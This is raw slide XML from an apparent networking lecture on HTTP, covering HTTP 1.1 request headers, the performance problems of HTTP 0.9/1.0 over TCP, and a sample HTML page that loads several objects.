                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="5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par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetID="42"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62"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2" grpId="0"/>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A92C-C2B3-AE67-83D1-54E99093CE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 1.1 Host Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD0738C-DF9F-8EC1-CB01-73B443A831AD}"/>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D88375-6C39-26DF-0826-2673E4A4BAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>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Method, resource, and version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFBFD92-D5FA-CBFE-0FD1-13A049DDE959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24426" y="2779595"/>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Accepted file types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FC1BDF-6A18-6842-31CD-0337461CCCC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24427" y="3132162"/>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Your browser and OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C5ACBD-E25E-1211-AE8F-E108E82BB53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24428" y="3484729"/>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Compressed responses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F52A679-EFD7-13DC-A594-3C56F78B89D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24423" y="3837296"/>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Your preferred language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED6D1AC8-DB43-EF6A-5B7F-75EB17A443E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24429" y="4189864"/>
            <a:ext cx="3484729" cy="3457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Previous site you were browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75EAB2F-C71B-4214-0880-771343DA2477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2401759"/>
            <a:ext cx="380658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GET /index.html HTTP/0.9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F66F913-93DC-65CB-C44D-EFFA6DAB39CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="2811069"/>
            <a:ext cx="6770007"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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5C89113-3375-F459-8309-EC6A543440F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3149692"/>
            <a:ext cx="8215813" cy="29051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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/65.0.3323.51</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72B4773F-A4F0-7DD1-EF81-B32319127F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3512344"/>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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E4C98A-D9F9-86A4-3A85-3BBD50C21232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="3862482"/>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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7D0441-9CEF-0117-8840-5AC169ED2C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556000" y="4238944"/>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err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: www.google.com/search</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F673579B-F96F-073E-8CE3-99989605AB33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25438" y="4515174"/>
            <a:ext cx="3484729" cy="345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t>Host being accessed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CD7B61-B404-F256-8A5B-9B9B2F71D594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="120138" y="4477471"/>
            <a:ext cx="7638197" cy="370047"/>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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35AFA702-F232-2F30-07F5-5942D4C07E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3554985" y="4540360"/>
            <a:ext cx="8215813" cy="2905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ptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.reddit.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305184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Problems with HTTP 0.9/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One request/response per TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad interactions with TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires a new three-way handshake for each object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two extra round trip for each object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High amounts of SYN/ACK overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of each object begins in slow start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objects tend to be small, TCP will never leave slow start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, loss recovery is poor when windows are small</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="986399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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203719" y="1825625"/>
            <a:ext cx="5220477" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple (typically small) objects per page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., each image, JS, CSS, etc. downloaded separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single page can have 100s of HTTP transactions!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File sizes are heavy-tailed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most transfers/objects very small</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 357"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816082" y="1519881"/>
            <a:ext cx="6127102" cy="46570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C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/title&gt;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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“../jquery.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/h1&gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>/my_face.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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&lt;p&gt;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I am 12 and what is</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&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>href</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"wierd_thing.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a: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&lt;/p&gt;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“http://www.images.com/cat.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/img&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9210092" y="365125"/>
            <a:ext cx="2438400" cy="1735494"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51700"/>
              <a:gd name="adj2" fmla="val 721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 total objects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1 HTML,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1 JavaScript,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>2 images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19797113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1.1 Connection Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
